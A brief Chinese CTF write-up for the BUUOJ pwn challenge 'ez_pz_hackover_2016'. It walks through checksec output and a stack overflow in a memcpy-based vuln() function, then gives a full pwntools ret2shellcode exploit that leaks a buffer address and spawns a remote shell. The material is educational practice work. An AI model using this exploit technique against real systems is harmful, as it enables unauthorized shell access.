checksec
发现NX保护未开启,因此可以考虑Ret2Shellcode。
1 2 3 4 5 6 7 8 [*] '/home/bronya/Documents/CTF/pwn17/ez_pz_hackover_2016' Arch: i386-32-little RELRO: Full RELRO Stack: No canary found NX: NX unknown - GNU_STACK missing PIE: No PIE (0x8048000) Stack: Executable RWX: Has RWX segments
ida查看,发现存在栈溢出漏洞,其中n=0x400,因此可以尝试向dest中写入shellcode。
1 2 3 4 5 6 void *__cdecl vuln (int src, size_t n) { char dest[50 ]; return memcpy (dest, &src, n); }
构造exp:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 from pwn import *context(arch='i386' , log_level='debug' ) p = remote('node4.buuoj.cn' , 26972 ) elf = ELF('./ez_pz_hackover_2016' ) printf_got = elf.got['printf' ] printf_plt = elf.plt['printf' ] shellcode = asm(shellcraft.sh()) p.recvuntil(b'Yippie, lets crash: 0x' ) buf_addr = int (p.recv(8 ), 16 ) - 0x1c print (hex (buf_addr))shellcode_addr = buf_addr payload = flat(b'crashme\x00' , b'a' *(0x16 -8 ), 0x0 , shellcode_addr, shellcode) p.sendlineafter(b'>' , payload) p.interactive()